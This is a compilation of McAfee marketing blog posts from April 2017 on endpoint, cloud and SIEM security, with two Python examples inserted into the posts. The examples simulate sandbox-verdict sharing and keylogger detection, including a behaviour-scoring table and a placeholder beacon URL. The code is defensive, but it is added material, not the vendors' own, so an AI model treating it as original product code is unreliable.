First, individual endpoint security operations can no longer be built around siloed point products. Each layer of endpoint security should be modular, like a blade snapping into a server chassis. Components should be able to exchange data in real time, so that, for example, when a new threat is detected by one piece of the system, the rest of the defense fabric is instantly aware of it and can automatically inoculate the rest of the environment. Everything should be visible from a single interface, so that the friction between different agents and processes disappears. And the security framework should be highly adaptable, so you can continually add new capabilities without requiring a top-to-bottom rip and replace.

It’s a different approach than most solutions out there today. But the sooner organizations start demanding it from their security vendors as a baseline business requirement, the sooner we’ll see snowballing endpoint complexity melt away.

Find Out More

McAfee is making this vision a reality right now. Our Dynamic Endpoint solution was designed from the ground up to break down barriers between siloed solutions, linking endpoint capabilities across the threat defense lifecycle into a single security fabric. We’re making endpoint defenses more adaptive and automated. And we’re helping security teams in every industry operate more efficiently—and stamp out security snowballs before they start.

The Growing Concerns Around Cloud Adoption in Saudi Arabia and the UAE (https://securingtomorrow.mcafee.com/business/growing-concerns-around-cloud-adoption-saudi-arabia-uae/, Tue, 25 Apr 2017 16:19:15 +0000)

Cloud adoption is steadily on the rise, creating a growing concern around cloud-borne threats, specifically in Saudi Arabia and the United Arab Emirates. In fact, the latest IDC trends report states that security continues to be the number one challenge facing Middle East-based CIOs, with spending on security systems in the region set to pass $2bn in 2017.

This is due to the shift from legacy IT systems to cloud-based services, and the security risks that move has created.

To study the security implications of cloud adoption, McAfee surveyed 1,400 IT security professionals globally, with 125 respondents from either Saudi Arabia or the United Arab Emirates; 70% came from organizations of over 1,000 employees and 30% from enterprises of between 500 and 1,000 employees.

Out of those 125 surveyed, a whopping 98% reported using some type of cloud service, much higher than the global average of 93%. And though 94% trust cloud computing more than they did 12 months ago, the top concern among Gulf Cooperation Council (GCC) respondents about using SaaS, after cost, is the “skills required by your IT security staff.”

In fact, the main deterrent to cloud adoption in the region is a lack of skilled staff who understand cloud architecture. 51% affirmed that they have slowed adoption due to a lack of cybersecurity skills (compared to 49% globally), and only 8% said they didn’t have a skills shortage, compared to a global response of 15%.

But beyond skills, the other top concern among respondents using IaaS was a tie between the ability of the cloud provider to meet service levels/SLAs for performance and availability, and departments commissioning IaaS workloads without involving the IT department (i.e., Shadow IT).

In fact, Shadow IT does seem to be a larger concern in the GCC compared to the global average, perhaps correlated with the skills shortage in IT. Business units are procuring cloud services on their own (see chart below). Over 46% of cloud services in these GCC countries are commissioned outside of the IT department, compared to a global average of almost 40%. Plus, 85% of respondents affirmed that Shadow IT impairs their organization’s ability to keep cloud services safe and secure, compared to the global average of 66%.

So, what’s the response to these concerns? Security as a service, and security in the cloud for the cloud. Cloud adoption is going to continue to drive the demand for cloud-based security for cloud-based applications and data.

To learn more about how security can address the growing concerns around cloud adoption, check out our report, Building Trust in a Cloudy Sky.

Join the conversation: Let us know what you think about cloud security by tweeting to us at @McAfee or @McAfee_Business.

Who Owns Your Cloud Security Stack? (https://securingtomorrow.mcafee.com/business/cloud-security/owns-cloud-security-stack/, Mon, 24 Apr 2017 23:39:12 +0000)

This blog was written by Nat Smith.

Sometimes I kick off a client conversation by asking, “What is your strategy for cloud security?”

It is surprising how often they not only have no such strategy, but do not even think they need one. They take the security options offered by their cloud service providers (CSPs) and assume their workloads are safe. Like most assumptions, this one can leave you looking foolish, because cloud security is seldom so simple.

Every workload is a stack of physical and virtual resources: network, servers, a hypervisor, storage, OSs, middleware, applications, data, and users. In an on-prem environment, we protect each workload with a parallel security stack: firewall, IPS, web and email proxies, endpoint protection, advanced malware detection, application controls, data encryption, identity and access management, and behavioral analytics. This not only protects the workloads (and the services they provide to our organizations), it keeps us compliant.

When we move to the public cloud, this clear line of security responsibility can blur. We outsource a slice of the workload stack to our CSP and leverage its optional security controls. These typically cover the provider’s own infrastructure and platform services, but not the higher tiers of the workload stack that we still configure, manage, and maintain ourselves. Too often we forget that we still own security for everything from the guest OS on up.

Amazon is admirably clear about how it divides the security domain.

“When evaluating the security of a cloud solution, it is important for customers to understand and distinguish between:

  • Security measures that the cloud service provider (AWS) implements and operates – “security of the cloud”
  • Security measures that the customer implements and operates, related to the security of customer content and applications that make use of AWS services – “security in the cloud”

While AWS manages security of the cloud, security in the cloud is the responsibility of the customer. Customers retain control of what security they choose to implement to protect their own content, platform, applications, systems and networks, no differently than they would for applications in an on-site datacenter.”

With Amazon at least, we know exactly where we stand. It is our job to secure our own OS, apps, data and users. The tools we choose and the way we fold them into our security and compliance frameworks are ours to decide as well. Other providers can and do draw the line differently.

The first challenge of protecting cloud workloads is knowing what you still own in the security stack. Only then can you be sure you have implemented the full security stack in the cloud.

Protecting your Network in the Public Cloud. Yeah, you still need to do that… (https://securingtomorrow.mcafee.com/business/protecting-network-public-cloud-yeah-still-need/, Fri, 21 Apr 2017 17:42:01 +0000)

This post was written by Loretta Nierat.

So you made the jump into the public cloud, and you chose to go with AWS. So far, so good. But what about security? Is AWS sufficient when it comes to keeping your data secure, or being able to accurately monitor your network? Or do you need additional protection?

As AWS points out, it’s important to understand the Shared Responsibility model. Depending on which AWS services you are embracing, AWS will provide security up to a certain level, and then it’s up to you to add further protection to ensure you are safe with the workloads you are running in the public cloud.

To understand the impact the public cloud (AWS) has on managing your infrastructure, and therefore what additional measures you need to take to ensure total security, let’s take a closer look at the Shared Responsibility model for Infrastructure Services, which includes AWS services such as EC2, Amazon EBS, and Amazon VPC. AWS secures the global infrastructure that you are running on and provides physical and virtualization security. But you are responsible for protecting the operating systems that you are using inside the virtual servers, as well as your applications and your network. In short, you should secure your servers and network as if they were in your own data center.

Now, the question is: even though you recognize the need for additional security in AWS, will the tools used in your on-premises data center or private cloud data center work well in the AWS environment? Oftentimes, the answer is no. To start, there are additional vulnerabilities within the public cloud, such as east-west exposure, that may require additional context or new techniques that are not needed in other data center environments. In addition, one of the prime reasons that AWS is so scalable and affordable is its dynamic and massively scalable network architecture. It allows AWS to spin up or retire workloads for you with ease, but it comes at the cost of your not controlling the infrastructure and underlying network. Traditional security controls that allow deeper traffic inspection assume you have control over traffic coming and going from your workloads; the opaque nature of the infrastructure and network makes this assumption invalid and requires a new approach to offer the same kind of protection.

First of all, you should leverage AWS VPC, which is another layer of network security. It provides you with a private, non-routable subnet, and it also lets you create IPsec tunnels between your home network and your AWS VPC.

Additionally, you will need network protection for your east-west traffic, which inspects network traffic even between your own virtual machines. After all, if malware gets into your VPC, it can travel laterally without being detected and infect all of your workloads. You must be able to see all inter-workload traffic (east-west vulnerabilities). To accomplish this, a process must be in place to reroute your workload traffic to virtual IPS sensors on an individual basis. This requires a different approach, or a different architecture.

The McAfee technology that provides that protection is McAfee Virtual Network Security Platform (vNSP), which is architected for AWS. vNSP delivers east-west network visibility with cutting-edge inspection techniques. It also discovers and blocks sophisticated threats in cloud architectures with accuracy and simplicity, enabling organizations to restore compliance and embrace cloud security with confidence. Advanced technologies include signature-less detection, in-line emulation, signature-based vulnerability patching, and support for Amazon Web Services (AWS) and network virtualization. With streamlined workflows, multiple integration options, and simplified licensing, organizations can easily manage and scale their security in the most complex cloud architectures.

One additional advantage is that vNSP provides dedicated threat protection across virtualized infrastructure and data centers, so you can use the same solution for not only the public cloud but also your own data center. vNSP enables you to have a single policy across environments, and it is designed to discover and block sophisticated threats in virtualized environments, from private clouds to software-defined data centers (SDDCs) to public clouds.

New Versions of Cloud Workload Discovery and McAfee MOVE AntiVirus Now Available! (https://securingtomorrow.mcafee.com/business/cloud-security/new-versions-cloud-workload-discovery-mcafee-move-antivirus-now-available/, Thu, 20 Apr 2017 15:00:32 +0000)

This blog post was written by Teresa Wingfield.

As part of our continued enhancements to our server security solutions, Cloud Workload Discovery 4.5.1 was released on March 27, 2017, and the McAfee MOVE AntiVirus 4.5.1 release followed on April 20, 2017. These solutions have some valuable new features and benefits that I’d like to share with you.

Cloud Workload Discovery 4.5.1

Let’s start with Cloud Workload Discovery 4.5.1. Cloud Workload Discovery, covering VMware, OpenStack, AWS and Microsoft Azure, provides end-to-end visibility into cloud workloads and their underlying platforms. You can get an in-depth description of Cloud Workload Discovery in our previous blog, “New Server Security Release Makes Borderless Cloud Security a Reality”. Prior to version 4.5.1, Cloud Workload Discovery worked with two of McAfee’s antivirus solutions, McAfee VirusScan Enterprise and McAfee MOVE AntiVirus.

Cloud Workload Discovery 4.5.1 extends visibility to McAfee Endpoint Security for AWS and Microsoft Azure workloads. McAfee Endpoint Security is a collaborative, extensible framework for protecting Microsoft Windows and Linux servers against zero-day exploits and advanced attacks. Now that Cloud Workload Discovery supports McAfee Endpoint Security, we are adding two of its modules, Threat Prevention and Firewall, to all three of our server security suites: McAfee Server Security Suite Essentials and McAfee Server Security Suite Advanced for hybrid cloud protection, and McAfee Public Cloud Security Suite.

Threat Prevention scans for viruses, spyware, unwanted programs and other threats, automatically on access or on demand at any time. The Firewall module monitors communication between the computer and resources on the network and the Internet to intercept suspicious communications.

McAfee MOVE AntiVirus 4.5.1

McAfee MOVE AntiVirus is a key component of McAfee Server Security Suite Essentials and McAfee Server Security Suite Advanced. As part of the 4.5.1 release, McAfee MOVE AntiVirus can now protect Linux virtual machines in agentless deployments, including 64-bit versions of SUSE Linux Enterprise Server 12, Red Hat Enterprise Linux 7 and Ubuntu 14.04 LTS. This covers all the Linux distributions supported by VMware NSX 6.3. In addition, McAfee MOVE AntiVirus (Agentless) is now certified for VMware NSX 6.3, so customers can be sure that these solutions work seamlessly together.

Learn More

Here are some links for our server security suites and McAfee MOVE AntiVirus if you’d like to find out more about these solutions:

  • McAfee Server Security Suite Essentials
  • McAfee Server Security Suite Advanced
  • McAfee Public Cloud Server Security Suite
  • McAfee MOVE AntiVirus

OpenDXL Case Study: Sandbox Mania featuring Cuckoo and Wildfire (https://securingtomorrow.mcafee.com/business/security-operations/opendxl-case-study-sandbox-mania-featuring-cuckoo-wildfire/, Wed, 19 Apr 2017 15:00:52 +0000)

This blog was written by Barbara Kay.

To unleash creativity, my middle school art teacher occasionally offered up all the painting, woodcarving, pottery, and collage resources in the studio, with no guidelines or constraints other than our imaginations and the available class time. The results ranged from the mundane to the inspired. I carved a 3D lobster. (Sadly, no picture survives, but let’s pretend it is as wonderful as the one here carved by Ryousuke Ohtake).

OpenDXL as a Blank Canvas

As an open source integration framework, OpenDXL is like that art studio. Creative security analysts and developers can use the OpenDXL SDK (libraries, classes, and helper classes), the Python client, and the code examples on GitHub to express their own ideas and activate their APIs. They can build everything from simple productivity boosters to sophisticated conditional workstreams.

Unfortunately, unlike the art classroom, OpenDXL projects aren’t easily visible. So, we at McAfee created a virtual studio, a contest to see what our sales engineers would create with OpenDXL. [We also captured some examples in our new Idea Guide, downloadable here.]

One of the first contest submissions, now published to github.com/opendxl-community, helps solve the age-old malware analysis dilemma: how many sandboxes are enough?

Simple POCs with high value

Jesse Netz, a sales engineer on the East Coast, used OpenDXL to integrate the open source Cuckoo sandbox and the Palo Alto Networks Wildfire sandbox with the DXL messaging fabric and the McAfee Advanced Threat Defense sandbox. These integrations can help enterprises get more value out of their existing resources and share the latest threat data for the fastest detection of emerging threats.

  1. A Cuckoo sandbox can pull changing malware file reputations maintained by the McAfee Threat Intelligence Exchange and include these reputations in its processing as well as the Cuckoo report. TIE provides visibility into the local prevalence of the file, helping the analyst understand how widespread an infection might be. In addition, customers who have the McAfee Advanced Threat Defense sandbox would see the ATD verdicts appear within the Cuckoo report, enriching the Cuckoo details about what the sample did while executing.
  2. DXL-integrated applications can use a lightweight DXL interface (service wrapper) instead of the Cuckoo APIs to access Cuckoo sandbox details (socket connections, registry writes, etc.) from anywhere, on-network or off-network. For this integration, Jesse reused a reference example provided in the OpenDXL SDK, the ePO API service wrapper.
  3. Wildfire verdicts update McAfee Threat Intelligence Exchange’s reputation database with new scores. Any application that listens to TIE reputation scores will get the updated information without having to integrate directly with Wildfire, and can immediately inoculate its systems by blocking the newly identified malware. This example converts verdicts to TIE reputations.
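The verdict-to-reputation conversion in item 3 can be modeled without a live DXL fabric. The block below is an added example, not Jesse Netz's submission or code from the opendxl-community repositories: an in-memory topic bus stands in for DXL topics, the WildFire verdict codes (0 benign, 1 malware, 2 grayware, 4 phishing, negative codes for pending/error/unknown/invalid hash) are assumed from the public WildFire API, the TIE trust-level values are assumed from the dxltieclient library, and the topic name is hypothetical. Verdicts that carry no information (pending, error, unknown) are deliberately not published, so an in-flight sample never overwrites a reputation TIE already holds.

```python
"""Convert WildFire sandbox verdicts into TIE-style reputation events.

Constructed example: an in-memory topic bus stands in for the DXL fabric.
The WildFire verdict codes and the TIE trust-level values are assumptions
taken from the public WildFire API and the dxltieclient documentation.
"""
from collections import defaultdict
from typing import Callable, Dict, List, Optional

# TIE trust levels (assumed from dxltieclient.constants.TrustLevel).
MOST_LIKELY_TRUSTED = 85
UNKNOWN = 50
MIGHT_BE_MALICIOUS = 30
MOST_LIKELY_MALICIOUS = 15
KNOWN_MALICIOUS = 1

# WildFire verdict codes (assumed from the public WildFire API).
WF_BENIGN, WF_MALWARE, WF_GRAYWARE, WF_PHISHING = 0, 1, 2, 4
WF_PENDING, WF_ERROR, WF_UNKNOWN, WF_INVALID_HASH = -100, -101, -102, -103

# Hypothetical topic name for this example; real TIE topics are different.
REPUTATION_TOPIC = "/example/tie/file/reputation/set"


def verdict_to_trust_level(verdict: int) -> Optional[int]:
    """Map a WildFire verdict to a TIE trust level.

    Returns None for verdicts that carry no information (pending, error,
    unknown, invalid hash) so the caller never publishes a reputation that
    would overwrite what TIE already knows about the file.
    """
    mapping = {
        # One sandbox saying "benign" is evidence, not proof of "known trusted".
        WF_BENIGN: MOST_LIKELY_TRUSTED,
        WF_MALWARE: KNOWN_MALICIOUS,
        WF_PHISHING: KNOWN_MALICIOUS,
        WF_GRAYWARE: MOST_LIKELY_MALICIOUS,
    }
    return mapping.get(verdict)


def normalize_sha256(digest: str) -> str:
    """Lower-case the digest and reject anything that is not 64 hex characters."""
    digest = digest.strip().lower()
    if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError("not a SHA-256 hex digest: %r" % digest)
    return digest


class TopicBus:
    """Minimal publish/subscribe bus standing in for DXL topics."""

    def __init__(self) -> None:
        self._subs: Dict[str, List[Callable[[dict], None]]] = defaultdict(list)

    def subscribe(self, topic: str, callback: Callable[[dict], None]) -> None:
        self._subs[topic].append(callback)

    def publish(self, topic: str, payload: dict) -> int:
        """Deliver the payload to every subscriber; returns how many were notified."""
        callbacks = self._subs.get(topic, [])
        for callback in callbacks:
            callback(payload)
        return len(callbacks)


def publish_wildfire_verdict(bus: TopicBus, sha256: str, verdict: int) -> Optional[dict]:
    """Translate one WildFire verdict and publish it as a reputation event.

    Returns the event that was published, or None when nothing was sent.
    """
    trust = verdict_to_trust_level(verdict)
    if trust is None:
        return None
    event = {"sha256": normalize_sha256(sha256), "trust_level": trust, "source": "wildfire"}
    bus.publish(REPUTATION_TOPIC, event)
    return event


class ReputationCache:
    """Subscriber standing in for an endpoint that consumes TIE reputations."""

    def __init__(self) -> None:
        self.reputations: Dict[str, int] = {}

    def on_reputation(self, event: dict) -> None:
        self.reputations[event["sha256"]] = event["trust_level"]

    def is_blocked(self, sha256: str, threshold: int = MIGHT_BE_MALICIOUS) -> bool:
        """Block at or below the threshold; files with no reputation are treated as unknown."""
        return self.reputations.get(normalize_sha256(sha256), UNKNOWN) <= threshold


def demo() -> ReputationCache:
    """Wire a cache to the bus and feed it constructed WildFire report rows."""
    bus = TopicBus()
    cache = ReputationCache()
    bus.subscribe(REPUTATION_TOPIC, cache.on_reputation)
    reports = [  # constructed rows; the digests are placeholders, not real samples
        {"sha256": "a" * 64, "verdict": WF_MALWARE},
        {"sha256": "B" * 64, "verdict": WF_BENIGN},
        {"sha256": "c" * 64, "verdict": WF_PENDING},
        {"sha256": "d" * 64, "verdict": WF_GRAYWARE},
    ]
    for row in reports:
        publish_wildfire_verdict(bus, row["sha256"], row["verdict"])
    return cache


if __name__ == "__main__":
    for digest, level in demo().reputations.items():
        print(digest[:12], level)
```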

Done in Hours, Not Weeks

The three integrations took a total of about 30 hours, with the hardest part being learning each third-party API. Once he had done the first OpenDXL integration, the subsequent ones were much easier. Without OpenDXL’s support for SSL, authentication, and authorization, Jesse estimates these integrations would have taken at least twice as long. Now, others don’t need to invest the time learning the Cuckoo and Wildfire APIs and doing point-to-point integrations; they can just leverage OpenDXL topics and Jesse’s new service wrapper.

Looking ahead, Jesse is considering his next OpenDXL development, but we won’t know until he formally submits it to the programming contest. In the meantime, please stay tuned to github.com/opendxl-community for more examples, and fuel your own projects with the new Idea Book.

The Power of an Integrated UEBA/SIEM Solution (https://securingtomorrow.mcafee.com/business/security-operations/power-integrated-uebasiem-solution/, Mon, 17 Apr 2017 15:00:14 +0000)

This blog post was written by Kristen Jacobsen.

If you’ve read our previous blog, “Leveraging UEBA Capabilities in Your Existing SIEM,” you understand how McAfee Enterprise Security Manager can perform many essential UEBA functions leveraging its built-in advanced analytics and behavior modeling.

Doing It Better Together

For several specific use cases, you may find that you need a third-party UEBA product. Fortunately, through the McAfee ecosystem approach to security, you can integrate UEBA solutions from other vendors to expand the visibility of McAfee Enterprise Security Manager’s user monitoring and analytics. Such tight integrations with McAfee Enterprise Security Manager optimize security operations by:

  • Adding user and entity threat data to McAfee Enterprise Security Manager’s threat and contextual parameters to trigger rapid response actions, such as policy changes, alerts, and escalations.
  • Leveraging response activities for deeper forensic investigations.
  • Enabling enhanced reporting, visibility, and management. Data collected by the UEBA solution can be sent to the McAfee Enterprise Security Manager reporting engine, which can then create visualizations of that information and synthesize it within its existing operational reports, dashboards, and workflows.

The McAfee and UEBA Vendor Partnerships

McAfee Security Innovation Alliance partnerships include numerous UEBA vendors that offer advanced UEBA solutions with flexible analytics engines covering insider threats, targeted attacks, and unknown threats. These platforms utilize machine learning and advanced analytics models that are well suited to large, complex enterprise environments.

McAfee Enterprise Security Manager and UEBA vendor integrations increase visibility into:

  • Insider threats across endpoints, servers, networks, and log data: The integration connects high-risk actions to users and provides clear context.
  • Privileged accounts: Time, authentication, access, application usage, and data movement are monitored and compared to baseline behavior parameters.
  • Targeted attacks: The integration quickly surfaces attack paths as they unfold, including malware that propagates laterally.
  • Healthcare compliance: Policy violations and risky user behaviors are identified by monitoring users, files, applications, and all types of medical and computing devices.

UEBA solution integrations with both the McAfee Enterprise Security Manager SIEM solution and the McAfee Data Exchange Layer threat intelligence sharing fabric can identify indicators of attack and feed those back into the SIEM to facilitate threat hunting. False positives are minimized, and analysts can focus on high-priority actionable items. In effect, these integrations create a closed-loop system, with continuous interaction between the products. Integration with McAfee Data Exchange Layer enables and accelerates communication of threat intelligence across multiple security solutions. This can dramatically speed detection and remediation across the entire enterprise security ecosystem, supporting the entire threat lifecycle.

Learn more about how McAfee Enterprise Security Manager can be leveraged to perform UEBA functions in our white paper, Entity Behavior Analytics for McAfee Enterprise Security Manager. Also, explore the UEBA vendors who are part of the McAfee Security Innovation Alliance.

For CGI, Protect-Detect-Correct Strategy Stands Out in McAfee Endpoint Security (https://securingtomorrow.mcafee.com/business/for-cgi-protect-detect-correct-strategy-stands-out-in-mcafee-endpoint-security/, Thu, 13 Apr 2017 16:37:33 +0000)

“What I love about McAfee is the protect-detect-correct strategy,” says Infrastructure Architect Niels Benders of CGI, a Montreal, Canada-based global IT consulting and outsourcing company with 55,000 endpoints in 30 countries. “[That strategy] works out smoothly in the latest version [10.5] of McAfee Endpoint Security.”

The ‘Protect-Detect-Correct’ strategy Benders refers to is the essence of a successful Threat Defense Lifecycle—namely, the ability to effectively block threats, quickly identify compromises, and expedite remediation when needed. Benders intuitively grasps how McAfee Endpoint Security (ENS) performs all three of these critical actions to help simplify the Threat Defense Lifecycle:

Protect. With an integrated firewall, updated web filtering, and more advanced threat protection, McAfee ENS protects CGI endpoints from botnets, distributed denial-of-service (DDoS) attacks, advanced persistent threats, and risky web connections. In addition, the Dynamic Application Containment (DAC) feature in ENS can analyze and take action against greyware and other emerging malware, quarantining them at patient zero to prevent infection.

Detect. The Real Protect functionality available in ENS 10.5 uses machine-learning behavior classification to improve detection and discover stealthy zero-day malware. By automatically evolving its behavior classification and adding rules to identify similar future attacks, Real Protect also speeds future detection. Furthermore, since ENS is built to communicate over the McAfee Data Exchange Layer (DXL) fabric, it can, via McAfee Threat Intelligence Exchange, share near real-time threat information with other local and global security systems and resources, such as the company’s McAfee Web Gateway appliances, to detect new and emerging threats.

Correct. “Within three clicks, you can find the [infected] system, investigate the system, and respond,” says Benders, whose enterprise team delivers endpoint protection to both internal and external customers. In short, for remediation “[McAfee ENS] saves time.”

In addition to endpoint protection, CGI counts on McAfee to protect its users from web-borne attacks wherever they are with McAfee Web Gateway appliances and McAfee Web Gateway Cloud Service. Thanks to the McAfee Client Proxy (MCP), CGI users and consultants are protected by the same CGI corporate security policies whether they access the Internet behind the corporate firewall or at home or at Starbucks.

All of CGI’s McAfee endpoint and web protection solutions are managed using the web-based McAfee ePolicy Orchestrator (ePO) console. Benders loves having a single pane of glass to manage multiple products and an integrated solution in which “everything works so well together.”

Watch a brief video of Benders talking about his experience with McAfee and find out what his favorite McAfee product is.

Get your questions answered by tweeting @McAfee_Business.

How Coordinated, Collaborative Security Can Help You Defeat Unknown Malware (https://securingtomorrow.mcafee.com/business/security-operations/coordinated-collaborative-security-can-help-defeat-unknown-malware/, Wed, 12 Apr 2017 19:00:51 +0000)

This blog was written by Stan Golubchik.

In a previous blog, “How to Gain a Competitive Advantage with an Integrated Approach to Security,” we showed how adding an advanced threat analysis technology to a large enterprise security ecosystem contributes to its success, both operationally and from a business perspective.

This time, we’ll step through the technical details of how to combat unknown malware in a typical enterprise environment. Let’s look at a company that has just gone through an acquisition. As a result of the acquisition, employees are being required to use many new applications. One of the employees clicks a link in an email for an application that appeared legitimate but is, in fact, malicious and installs a keylogger that captures users’ keystrokes.

Here’s how the McAfee integrated ecosystem approach to security rapidly responds to unknown files of this kind and prevents them from executing and doing damage across the organization.

Step 1:

McAfee Threat Intelligence Exchange discovers the keylogger on endpoints and blocks the file from executing. The Threat Intelligence Exchange client then queries the McAfee Threat Intelligence Exchange server for the file’s reputation and simultaneously queries McAfee Global Threat Intelligence, which gathers file reputation intelligence from millions of sensors all over the world. The file is cached on the server while McAfee Threat Intelligence Exchange checks its blacklist and whitelist. After this query-response process, McAfee Threat Intelligence Exchange can update the reputation as “good” or “bad.” However, in this case, the file is unknown and requires further analysis.

McAfee Advanced Threat Defense combines sandboxing dynamic code analysis with in-depth static code analysis to identify any potentially malicious code.

Step 2:

Through a REST API, McAfee Threat Intelligence Exchange sends the unknown file to McAfee Advanced Threat Defense for further analysis via sandboxing. McAfee Advanced Threat Defense spins up a virtual machine (VM) to detonate the file via dynamic analysis, which enables examination of any malicious behavior. At the same time, McAfee Advanced Threat Defense performs static code analysis by unpacking the file and reverse engineering the code, allowing comparison to known malware families that reuse code and identifying any potentially malicious code. Obfuscated and metamorphic code, which can be highly evasive, can be unveiled through the combination of dynamic and static code analysis. If any malicious intent is identified, McAfee Advanced Threat Defense convicts the file and updates the reputation, applying a high-severity rating in this case. This process reveals several indicators of compromise (IoCs) about the file: it attempts to bypass security controls, it installs a keylogger, and it makes connections to risky websites. The verdict is then sent back to the McAfee Threat Intelligence Exchange server, which updates its local repository and any integrated vector from endpoint to network. McAfee Advanced Threat Defense also publishes the IoCs across the McAfee Data Exchange Layer (McAfee DXL) to any subscriber.

Step 3:

McAfee Data Exchange Layer, which enables sharing of threat information across McAfee security components and third-party security products, publishes these IoCs for ingestion by other solutions in the environment.

Step 4:

McAfee Data Exchange Layer will publish IoCs generated from McAfee Advanced Threat Defense to the security information and event management system (SIEM), McAfee Enterprise Security Manager. The SIEM then aggregates the IoCs and correlates these events. For example, it can do historic investigation, looking into its archives of networks or systems to find evidence of this malware and correlate these IoCs with other events. If it finds that systems have connected to malicious URLs associated with the keylogger, it can send out additional alerts so that remediation can be applied. Once the correlation has been done, McAfee Endpoint Threat Defense and Response uses its automated search capability to get access to this information and generates a URL that will open up the McAfee ePolicy Orchestrator (McAfee ePO) management console where McAfee Active Response is housed, and the pivot to remediation can take place.

Step 5:

Since the malware has a high-severity rating, McAfee Enterprise Security Manager triggers an alert, which enables the administrator to take remediation actions, such as killing the process or removing the file—along with any trace files—from the affected machines.

This use case illustrates the value of a unified architecture, where collaboration of all your security components can dramatically improve security operation response and efficiency, reduce threat dwell time, and increase your capacity to handle security events. In a recent McAfee survey, 70% of participants believe that this approach results in reduction of manual efforts through integrated workflows and automation and 65% believe it provides more effective triage automation.
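The five steps above as a defender-side simulation. This is example code added here, not McAfee’s own, and everything in it is constructed: the file hashes, the hostnames, the `.example` URLs, the archived events, and the behaviour weight table that stands in for the sandbox’s dynamic and static analysis. A reputation lookup comes back unknown, the stand-in analysis convicts the file and packages its IoCs, a small publish/subscribe bus takes the place of DXL, and the SIEM stand-in searches its archive for hosts that ran the hash or contacted the flagged URL so that remediation has a target list.

```python
"""Simulated reputation -> analysis -> IoC sharing -> SIEM correlation flow.
All hashes, hosts, URLs, archived events and the scoring table are constructed."""
import hashlib


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Step 1: local reputation cache (constructed whitelist; blacklist starts empty)
KNOWN_GOOD = {sha256_hex(b"hr-portal-installer-v2")}
KNOWN_BAD = set()
SAMPLE_HASH = sha256_hex(b"new-app-installer.exe")  # the unknown file


def reputation_lookup(file_hash: str) -> str:
    """Return 'good', 'bad' or 'unknown'; unknown files go on to analysis."""
    if file_hash in KNOWN_BAD:
        return "bad"
    return "good" if file_hash in KNOWN_GOOD else "unknown"


# Step 2: stand-in for detonation plus static analysis. A real report lists
# observed behaviours; a constructed weight table turns them into a severity.
BEHAVIOUR_WEIGHTS = {
    "disables_security_tool": 40,
    "installs_keyboard_hook": 40,
    "contacts_low_reputation_url": 20,
    "writes_startup_entry": 10,
}


def analyze_unknown(file_hash: str, report: dict) -> dict:
    """Score the behaviours, convict, and package the IoCs for sharing."""
    score = sum(BEHAVIOUR_WEIGHTS.get(b, 0) for b in report["behaviours"])
    severity = "high" if score >= 70 else "medium" if score >= 30 else "low"
    return {"sha256": file_hash, "severity": severity, "urls": sorted(report.get("urls", []))}


# Step 3: publish/subscribe fabric standing in for the Data Exchange Layer
class MessageBus:
    def __init__(self):
        self._subs = {}

    def subscribe(self, topic, handler):
        self._subs.setdefault(topic, []).append(handler)

    def publish(self, topic, message):
        for handler in self._subs.get(topic, []):
            handler(message)


# Steps 4 and 5: SIEM stand-in over a constructed archive of (time, host, type, value)
ARCHIVE = [
    ("2017-04-10T09:02:11Z", "WS-07", "proc_start", SAMPLE_HASH),
    ("2017-04-10T09:02:40Z", "WS-07", "http_connect", "http://update-check.example/beacon"),
    ("2017-04-10T10:15:03Z", "WS-12", "http_connect", "http://update-check.example/beacon"),
    ("2017-04-10T11:00:00Z", "WS-03", "http_connect", "https://intranet.example/hr"),
    ("2017-04-11T08:30:22Z", "WS-19", "proc_start", sha256_hex(b"hr-portal-installer-v2")),
]


class Siem:
    def __init__(self, archive):
        self.archive = archive
        self.alerts = []

    def ingest_iocs(self, iocs: dict) -> dict:
        """Historic search: which hosts ran the hash or reached its URLs?"""
        bad_urls = set(iocs["urls"])
        hits = {}
        for when, host, etype, value in self.archive:
            if (etype == "proc_start" and value == iocs["sha256"]) or (
                etype == "http_connect" and value in bad_urls
            ):
                hits.setdefault(host, []).append((when, etype))
        if hits and iocs["severity"] == "high":  # high severity: alert for remediation
            self.alerts.append({"sha256": iocs["sha256"], "hosts": sorted(hits)})
        return hits


def run_pipeline() -> dict:
    """Walk the unknown file through all five steps and report the outcome."""
    bus = MessageBus()
    siem = Siem(ARCHIVE)
    bus.subscribe("threat/iocs", siem.ingest_iocs)
    reputation = reputation_lookup(SAMPLE_HASH)
    if reputation != "unknown":
        return {"reputation": reputation, "severity": None, "affected_hosts": []}
    # Constructed sandbox observations matching the keylogger in the post
    report = {
        "behaviours": ["disables_security_tool", "installs_keyboard_hook", "contacts_low_reputation_url"],
        "urls": ["http://update-check.example/beacon"],
    }
    iocs = analyze_unknown(SAMPLE_HASH, report)
    KNOWN_BAD.add(SAMPLE_HASH)  # reputation update: every endpoint now blocks it
    bus.publish("threat/iocs", iocs)
    hosts = sorted({h for alert in siem.alerts for h in alert["hosts"]})
    return {"reputation": "bad", "severity": iocs["severity"], "affected_hosts": hosts}
```

Running `run_pipeline()` once convicts the sample, updates the reputation cache, and returns the two hosts that either executed the file or reached its beacon URL; a second call short-circuits at step 1 because the cache now answers "bad" without any further analysis, which is the dwell-time saving the post describes.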

Watch our video, and see the power of McAfee integration and intelligence sharing in action: “Defeat the Grey.”

Tearing Down Walls as the New McAfee
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/tearing-walls-new-mcafee/
Wed, 12 Apr 2017 15:00:30 +0000

This blog was written by Jason Grier.

As we embark on our journey as a new company, we look towards our goals to help guide us along the way. Our north star? Collaboration. We want to tear down walls, because we know that we’re stronger together. But in order to do this, we first have to take the right steps to get there, including opening up the dialogue with our customers that keeps education a top priority, and supporting each other internally. And with those acting as our guide posts, the new McAfee can continue to succeed in ensuring safety for all.

Listening to Our Customers

As the new McAfee, our defined position in the market will help us continue our strong communication and collaboration with our customers. An open dialogue is crucial for customer success, so it’s important that we continue to build out a unique and personal experience. That means we’re going to strengthen the listening posts we have for every point of the customer journey, so they feel supported while they navigate the cybersecurity landscape. We’re also now going to set up resources in a centralized fashion to approach customer response with a data-driven method. That way, we can capture the similarities we hear from customers and make them into something actionable, which in turn allows us to provide a more immediate and direct fix to the problem.
The good news is: this has already started to become second nature to us because of the precedent Chris Young has set. When it comes to listening to customers and taking action, he truly leads by example. He’s completely customer-facing, he listens to issues, meets regularly, and most importantly, he sets clear expectations around taking action on what people are saying.
